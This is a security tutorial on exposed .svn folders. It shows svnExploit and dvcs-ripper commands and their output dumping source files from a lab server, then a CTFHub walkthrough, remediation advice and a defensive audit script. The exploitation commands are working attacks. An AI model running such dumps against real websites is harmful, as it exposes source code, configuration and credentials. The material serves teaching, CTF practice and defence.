Vulnerability introduction
SVN is an open source version control system. When SVN is used to manage local code, a hidden folder named .svn is generated automatically, and it contains important source code information. If the website administrator does not use the export function when publishing the code, but instead copies the code folder directly to the web server, the .svn hidden folder is exposed to the external network. The .svn/entries file can then be used to obtain the server's source code.
Exploitation tools
Seay-SVN exploit tool
dvcs-ripper
https://github.com/kost/dvcs-ripper
Install third-party dependencies:
sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl
sudo apt-get install libparallel-forkmanager-perl libredis-perl libalgorithm-combinatorics-perl
sudo apt-get install cvs subversion git bzr mercurial
Use script
svnExploit.py
https://github.com/admintony/svnExploit
Vulnerability detection:
python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/
 ____             _____            _       _ _
/ ___|_   ___ __ | ____|_  ___ __ | | ___ (_) |_
\___ \ \ / / '_ \|  _| \ \/ / '_ \| |/ _ \| | __|
 ___) \ V /| | | | |___ >  <| |_) | | (_) | | |_
|____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__|
                            |_|
SvnExploit - Dump the source code by svn
Author: AdminTony (http://admintony.com)
https://github.com/admintony/svnExploit

+--------------------+-----------+------------------------------------------------+
| File Name          | File Type | CheckSum                                       |
+--------------------+-----------+------------------------------------------------+
| conn.php           | file      | $sha1$8f47ccbd4a436aa4f31018fea026275f6059ed10 |
| trunk              | dir       | None                                           |
| branches           | dir       | None                                           |
| admin_login.php    | file      | $sha1$a6981b1ca963c8a75e133e38780be7ff0cd60952 |
| phpmyadmin         | file      | $sha1$6d5af41c175e344ee483732648edc9318b2a6014 |
| README.TXT         | file      | $sha1$c5981462cc06422f4a78e68f0a48dddcf5860eb9 |
| README.txt         | file      | $sha1$ef4b5f3081dbac31f9fb089aafd60dd2b9474b51 |
| secret.php         | file      | $sha1$2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609 |
| README.md          | file      | $sha1$466f5ab1e4adfd373a23f639e0dd8fcfdce7874b |
| img/login_bg01.jpg | file      | $sha1$311efc58c4d7035a54fdb8e94d6ba901c56354fd |
| img                | dir       | None                                           |
| index.php          | file      | $sha1$4660847a73ab0906d91841dde9576bd5054b2020 |
| test.sql           | file      | $sha1$096a90da3e471a472874413b18cb2f5dd0567fd1 |
| admin.php          | file      | $sha1$f444d3aad996577872ac7b95a2c05aa11e6b1f8f |
| document           | dir       | None                                           |
| tags               | dir       | None                                           |
+--------------------+-----------+------------------------------------------------+
Get source code information
python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/ --dump
 ____             _____            _       _ _
/ ___|_   ___ __ | ____|_  ___ __ | | ___ (_) |_
\___ \ \ / / '_ \|  _| \ \/ / '_ \| |/ _ \| | __|
 ___) \ V /| | | | |___ >  <| |_) | | (_) | | |_
|____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__|
                            |_|
SvnExploit - Dump the source code by svn
Author: AdminTony (http://admintony.com)
https://github.com/admintony/svnExploit

+--------------------+--------------------------------------------------------------------+---------------------+
| File name          | URL                                                                | Download status     |
+--------------------+--------------------------------------------------------------------+---------------------+
| conn.php           | .svn/pristine/8f/8f47ccbd4a436aa4f31018fea026275f6059ed10.svn-base | Download successful |
| README.TXT         | .svn/pristine/c5/c5981462cc06422f4a78e68f0a48dddcf5860eb9.svn-base | Download successful |
| README.txt         | .svn/pristine/ef/ef4b5f3081dbac31f9fb089aafd60dd2b9474b51.svn-base | Download successful |
| phpmyadmin         | .svn/pristine/6d/6d5af41c175e344ee483732648edc9318b2a6014.svn-base | Download successful |
| secret.php         | .svn/pristine/2e/2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609.svn-base | Download successful |
| README.md          | .svn/pristine/46/466f5ab1e4adfd373a23f639e0dd8fcfdce7874b.svn-base | Download successful |
| admin_login.php    | .svn/pristine/a6/a6981b1ca963c8a75e133e38780be7ff0cd60952.svn-base | Download successful |
| index.php          | .svn/pristine/46/4660847a73ab0906d91841dde9576bd5054b2020.svn-base | Download successful |
| admin.php          | .svn/pristine/f4/f444d3aad996577872ac7b95a2c05aa11e6b1f8f.svn-base | Download successful |
| test.sql           | .svn/pristine/09/096a90da3e471a472874413b18cb2f5dd0567fd1.svn-base | Download successful |
| img/login_bg01.jpg | .svn/pristine/31/311efc58c4d7035a54fdb8e94d6ba901c56354fd.svn-base | Download successful |
+--------------------+--------------------------------------------------------------------+---------------------+
[+] Dump completed!
Simple case
Let's take an SVN information leakage challenge from CTFHUB as an example:
Step 1: Visit the challenge environment address and you will see the following prompt information
CTFHub environment instance | prompt information
Step 2: Use directory scanning to confirm that there is indeed an SVN information leak
python3 dirsearch.py -u http://challenge-09e40d4fa439d842.sandbox.ctfhub.com:10800/ -e *
Step 3: Use the rip-svn.pl script in the dvcs-ripper tool to clone
./rip-svn.pl -u http://challenge-09e40d4fa439d842.sandbox.ctfhub.com:10800/.svn/
Find the file name of the flag file in wc.db, then try to access it; the file turns out to have been deleted.
cat wc.db | grep -a flag
Turn to the files in .svn/pristine/ and find the flag: ctfhub{fc8dfadda86879a9956cde97}
Repair suggestions
Delete all .svn hidden folders in the web directory. Developers who use SVN must publish code with the export function; copying the code folder directly is prohibited.
- Review the code: The code needs to be reviewed regularly to ensure that no sensitive information has been leaked. You can use SVN’s search function to find sensitive information such as: passwords and credentials.
- Restrict access rights: Restrict access rights to the SVN server to ensure that only authorized users can access the SVN server. You can use the SVN access control function to limit user access rights.
- Enhance security measures: To prevent future breaches, security measures need to be enhanced. For example, restrict access to the SVN server, use multi-factor authentication, change passwords regularly, etc.
- Regularly back up data: The data of the SVN server needs to be backed up regularly to prevent data loss or damage. Backup data should be stored in a secure location and the recoverability of backup data should be tested regularly.
- Encrypt sensitive information: SVN does not have an undo commit feature like Git, so other means need to be used to protect sensitive information. Sensitive information can be encrypted using encryption algorithms to protect it from direct reading.
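An audit that a deployment job can run against its own web directory before the cleanup recommended above (an added example, not code from the original page or from the tools it lists). It reads wc.db and the .svn/pristine/ layout seen in the tool output, and also reports files that were deleted from the web root but remain recoverable, as in the CTFHUB case; the function names, the reduced NODES table and the sample files are constructed for illustration.

```python
import hashlib
import sqlite3
import tempfile
from pathlib import Path

def audit_webroot(webroot):
    """List files recoverable from .svn metadata left under a web root."""
    findings = []
    for svn_dir in Path(webroot).rglob(".svn"):
        db = svn_dir / "wc.db"
        if not (svn_dir.is_dir() and db.is_file()):
            continue
        # Open read-only so the audit never modifies the working copy.
        con = sqlite3.connect(db.resolve().as_uri() + "?mode=ro", uri=True)
        try:
            rows = con.execute(
                "SELECT local_relpath, checksum FROM NODES "
                "WHERE kind = 'file' AND checksum IS NOT NULL").fetchall()
        finally:
            con.close()
        for relpath, checksum in rows:
            digest = checksum.rsplit("$", 1)[-1]  # "$sha1$<hex>" -> "<hex>"
            blob = svn_dir / "pristine" / digest[:2] / f"{digest}.svn-base"
            if not blob.is_file():
                continue
            live = (svn_dir.parent / relpath).is_file()
            findings.append({
                "file": relpath,
                "pristine": blob.relative_to(svn_dir.parent).as_posix(),
                "state": "deployed" if live else "deleted, still recoverable",
            })
    return findings

def build_sample_webroot():
    """Constructed sample: a copied working copy where flag.txt was later deleted."""
    root = Path(tempfile.mkdtemp())
    svn = root / ".svn"
    svn.mkdir()
    con = sqlite3.connect(svn / "wc.db")
    # Reduced NODES table holding only the columns the audit reads (assumption).
    con.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, checksum TEXT)")
    for name, body in (("index.php", b"<?php echo 'hi';"), ("flag.txt", b"constructed-secret")):
        digest = hashlib.sha1(body).hexdigest()
        blob = svn / "pristine" / digest[:2] / f"{digest}.svn-base"
        blob.parent.mkdir(parents=True, exist_ok=True)
        blob.write_bytes(body)
        con.execute("INSERT INTO NODES VALUES (?, 'file', ?)", (name, "$sha1$" + digest))
    con.execute("INSERT INTO NODES VALUES ('img', 'dir', NULL)")
    con.commit()
    con.close()
    (root / "index.php").write_bytes(b"<?php echo 'hi';")  # flag.txt is not deployed
    return root
```

Any finding means the web directory was copied rather than exported; a "deleted, still recoverable" entry shows that removing the file alone does not remove its pristine copy.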